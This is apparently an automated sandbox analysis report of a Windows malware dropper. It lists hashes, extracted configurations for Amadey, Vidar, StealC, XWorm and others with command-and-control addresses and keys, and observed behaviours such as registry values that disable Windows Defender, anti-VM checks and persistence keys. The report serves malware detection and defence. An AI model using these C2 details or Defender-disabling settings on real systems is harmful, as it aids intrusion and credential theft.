Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05/03/2025, 22:28
Static task
static1
Behavioral task
behavioral1
Sample
d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe
Resource
win10v2004-20250217-en
General
-
Target
d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe
-
Size
1.8MB
-
MD5
4cf553af549bd99fa44da57de08620a8
-
SHA1
67e04f4434f0a63b082b0c8f148f5c100a77e27f
-
SHA256
d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e
-
SHA512
4ac6fae3a8aeda3a8a0e01d0e59385f674b72ccea57586b007a1a65e810c4063f2ea85a62f002b9fe522c2a986ae7faf2e0f3f5cb5cc5ccbd2a58851df7b2186
-
SSDEEP
49152:ZiUR7v8FfVoczMDeTHzkfyR2XKusikeZspsfHz:Z9ZvCtCD2QfC4hsikBpGH
Malware Config
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Extracted
vidar
ir7am
https://t.me/l793oy
https://steamcommunity.com/profiles/76561199829660832
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
systembc
towerbingobongoboom.com
62.60.226.86
-
dns
5.132.191.104
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
xworm
5.0
45.154.98.175:6969
uGmGtmYAbzOi1F41
-
Install_directory
%AppData%
-
install_file
google_updates.exe
Signatures
-
Amadey family
-
Detect Vidar Stealer 6 IoCs
resource yara_rule behavioral1/memory/2044-222-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/2044-225-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/2044-220-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/2044-218-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/2044-216-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/2044-230-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/files/0x000700000001a4e0-867.dat family_xworm behavioral1/memory/3240-873-0x0000000000B80000-0x0000000000B90000-memory.dmp family_xworm behavioral1/memory/3640-872-0x0000000000EC0000-0x0000000001332000-memory.dmp family_xworm behavioral1/memory/2800-886-0x00000000009A0000-0x00000000009B0000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/3640-824-0x0000000000EC0000-0x0000000001332000-memory.dmp healer behavioral1/memory/3640-830-0x0000000000EC0000-0x0000000001332000-memory.dmp healer -
Healer family
-
Litehttp family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 8e275fbb94.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 8e275fbb94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 8e275fbb94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 8e275fbb94.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 8e275fbb94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 8e275fbb94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 8e275fbb94.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 8e275fbb94.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 8e275fbb94.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications 8e275fbb94.exe -
Stealc family
-
Systembc family
-
Vidar family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ vertualiziren.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 460d9c14c9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8e275fbb94.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 69c80032ec.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 41108e652a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe -
pid Process 1504 powershell.exe 2616 powershell.exe 2780 powershell.exe 2616 powershell.exe -
Downloads MZ/PE file 16 IoCs
flow pid Process 47 2668 rapes.exe 62 2308 Gxtuum.exe 5 2668 rapes.exe 5 2668 rapes.exe 5 2668 rapes.exe 5 2668 rapes.exe 5 2668 rapes.exe 5 2668 rapes.exe 5 2668 rapes.exe 5 2668 rapes.exe 5 2668 rapes.exe 63 2668 rapes.exe 63 2668 rapes.exe 63 2668 rapes.exe 63 2668 rapes.exe 63 2668 rapes.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x00050000000194ff-193.dat net_reactor behavioral1/memory/2052-205-0x0000000000E30000-0x0000000000E90000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8e275fbb94.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vertualiziren.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 460d9c14c9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 69c80032ec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 41108e652a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 41108e652a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vertualiziren.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8e275fbb94.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 460d9c14c9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 69c80032ec.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk cnntXtU.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk cnntXtU.exe -
Executes dropped EXE 29 IoCs
pid Process 2668 rapes.exe 1728 PcAIvJ0.exe 1488 ktxzLhN.exe 2300 dll32.exe 940 zY9sqWs.exe 1040 v6Oqdnc.exe 2752 MCxU5Fj.exe 2576 MCxU5Fj.exe 2608 MCxU5Fj.exe 2324 ce4pMzk.exe 2052 mAtJWNv.exe 2044 mAtJWNv.exe 1616 SvhQA35.exe 3056 chromium.exe 1640 FvbuInU.exe 2012 Ps7WqSx.exe 2800 ktxzLhN.exe 2880 dll32.exe 2964 nhDLtPT.exe 2308 Gxtuum.exe 1600 nhDLtPT.exe 2844 vertualiziren.exe 2736 460d9c14c9.exe 1972 69c80032ec.exe 2004 63f1932a62.exe 3640 8e275fbb94.exe 3632 41108e652a.exe 3240 cnntXtU.exe 2800 cnntXtU.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine FvbuInU.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine 460d9c14c9.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine 69c80032ec.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine 8e275fbb94.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine 41108e652a.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine v6Oqdnc.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine vertualiziren.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe -
Loads dropped DLL 63 IoCs
pid Process 2160 d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe 2668 rapes.exe 2668 rapes.exe 2668 rapes.exe 2300 dll32.exe 2668 rapes.exe 2668 rapes.exe 2668 rapes.exe 2668 rapes.exe 2092 WerFault.exe 2092 WerFault.exe 2092 WerFault.exe 2668 rapes.exe 2752 MCxU5Fj.exe 2752 MCxU5Fj.exe 2868 WerFault.exe 2868 WerFault.exe 2868 WerFault.exe 2868 WerFault.exe 2868 WerFault.exe 1460 WerFault.exe 1460 WerFault.exe 1460 WerFault.exe 1460 WerFault.exe 1460 WerFault.exe 2668 rapes.exe 2668 rapes.exe 2668 rapes.exe 2052 mAtJWNv.exe 1716 WerFault.exe 1716 WerFault.exe 1716 WerFault.exe 2668 rapes.exe 1616 SvhQA35.exe 3056 chromium.exe 2668 rapes.exe 2668 rapes.exe 2668 rapes.exe 2668 rapes.exe 2668 rapes.exe 2880 dll32.exe 2668 rapes.exe 2964 nhDLtPT.exe 2668 rapes.exe 2308 Gxtuum.exe 2308 Gxtuum.exe 2668 rapes.exe 2668 rapes.exe 2764 WerFault.exe 2764 WerFault.exe 2764 WerFault.exe 2668 rapes.exe 2668 rapes.exe 2668 rapes.exe 2668 rapes.exe 2668 rapes.exe 2668 rapes.exe 2668 rapes.exe 2668 rapes.exe 3416 WerFault.exe 3416 WerFault.exe 3416 WerFault.exe 2668 rapes.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 8e275fbb94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 8e275fbb94.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\69c80032ec.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107380101\\69c80032ec.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\63f1932a62.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107390101\\63f1932a62.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\8e275fbb94.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107400101\\8e275fbb94.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" cnntXtU.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\8QpbZ8u9\\Anubis.exe\"" ce4pMzk.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\460d9c14c9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107370101\\460d9c14c9.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 7 raw.githubusercontent.com 46 raw.githubusercontent.com 6 raw.githubusercontent.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000600000001a4d2-656.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 64 IoCs
pid Process 3932 tasklist.exe 3964 tasklist.exe 2700 tasklist.exe 2836 tasklist.exe 1288 tasklist.exe 2400 tasklist.exe 1988 tasklist.exe 4052 tasklist.exe 3976 tasklist.exe 2880 tasklist.exe 2760 tasklist.exe 1748 tasklist.exe 1300 tasklist.exe 2924 tasklist.exe 3248 tasklist.exe 3028 tasklist.exe 2940 tasklist.exe 1736 tasklist.exe 2436 tasklist.exe 3060 tasklist.exe 3924 tasklist.exe 1296 tasklist.exe 2784 tasklist.exe 1700 tasklist.exe 908 tasklist.exe 2568 tasklist.exe 2136 tasklist.exe 1544 tasklist.exe 4072 tasklist.exe 4024 tasklist.exe 2864 tasklist.exe 1316 tasklist.exe 304 tasklist.exe 1480 tasklist.exe 1288 tasklist.exe 3364 tasklist.exe 3860 tasklist.exe 3884 tasklist.exe 3312 tasklist.exe 3980 tasklist.exe 2796 tasklist.exe 3016 tasklist.exe 2728 tasklist.exe 1056 tasklist.exe 296 tasklist.exe 3060 tasklist.exe 3828 tasklist.exe 3868 tasklist.exe 2920 tasklist.exe 1236 tasklist.exe 916 tasklist.exe 3256 tasklist.exe 2840 tasklist.exe 1144 tasklist.exe 2284 tasklist.exe 2344 tasklist.exe 580 tasklist.exe 3404 tasklist.exe 2080 tasklist.exe 2004 tasklist.exe 2144 tasklist.exe 748 tasklist.exe 3820 tasklist.exe 3264 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 2160 d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe 2668 rapes.exe 1040 v6Oqdnc.exe 1640 FvbuInU.exe 2844 vertualiziren.exe 2736 460d9c14c9.exe 1972 69c80032ec.exe 3640 8e275fbb94.exe 3632 41108e652a.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2752 set thread context of 2608 2752 MCxU5Fj.exe 48 PID 2052 set thread context of 2044 2052 mAtJWNv.exe 53 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe File created C:\Windows\Tasks\Gxtuum.job nhDLtPT.exe File created C:\Windows\Tasks\Test Task17.job vertualiziren.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
pid pid_target Process procid_target 2092 1040 WerFault.exe 44 2868 2752 WerFault.exe 46 1460 2608 WerFault.exe 48 1716 2052 WerFault.exe 52 2764 2736 WerFault.exe 196 3416 3632 WerFault.exe 310 -
System Location Discovery: System Language Discovery 1 TTPs 26 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vertualiziren.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ps7WqSx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nhDLtPT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 69c80032ec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 460d9c14c9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 63f1932a62.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 41108e652a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvbuInU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 63f1932a62.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8e275fbb94.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 63f1932a62.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe -
Delays execution with timeout.exe 64 IoCs
pid Process 2828 timeout.exe 1256 timeout.exe 2872 timeout.exe 880 timeout.exe 1048 timeout.exe 1852 timeout.exe 296 timeout.exe 1268 timeout.exe 2292 timeout.exe 300 timeout.exe 1788 timeout.exe 3668 timeout.exe 2440 timeout.exe 840 timeout.exe 2672 timeout.exe 2564 timeout.exe 3904 timeout.exe 3048 timeout.exe 3356 timeout.exe 1688 timeout.exe 2636 timeout.exe 2768 timeout.exe 2200 timeout.exe 2016 timeout.exe 1908 timeout.exe 1536 timeout.exe 4052 timeout.exe 2456 timeout.exe 2828 timeout.exe 1980 timeout.exe 2560 timeout.exe 2332 timeout.exe 1576 timeout.exe 1584 timeout.exe 3320 timeout.exe 2248 timeout.exe 3168 timeout.exe 1676 timeout.exe 2248 timeout.exe 2152 timeout.exe 2560 timeout.exe 1700 timeout.exe 3992 timeout.exe 296 timeout.exe 2460 timeout.exe 1288 timeout.exe 3428 timeout.exe 3972 timeout.exe 3616 timeout.exe 2732 timeout.exe 1700 timeout.exe 2996 timeout.exe 1720 timeout.exe 3916 timeout.exe 3952 timeout.exe 4028 timeout.exe 2176 timeout.exe 1572 timeout.exe 2704 timeout.exe 592 timeout.exe 2360 timeout.exe 2064 timeout.exe 4004 timeout.exe 2180 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 396 taskkill.exe 772 taskkill.exe 908 taskkill.exe 2704 taskkill.exe 2776 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 FvbuInU.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a FvbuInU.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a FvbuInU.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 mAtJWNv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 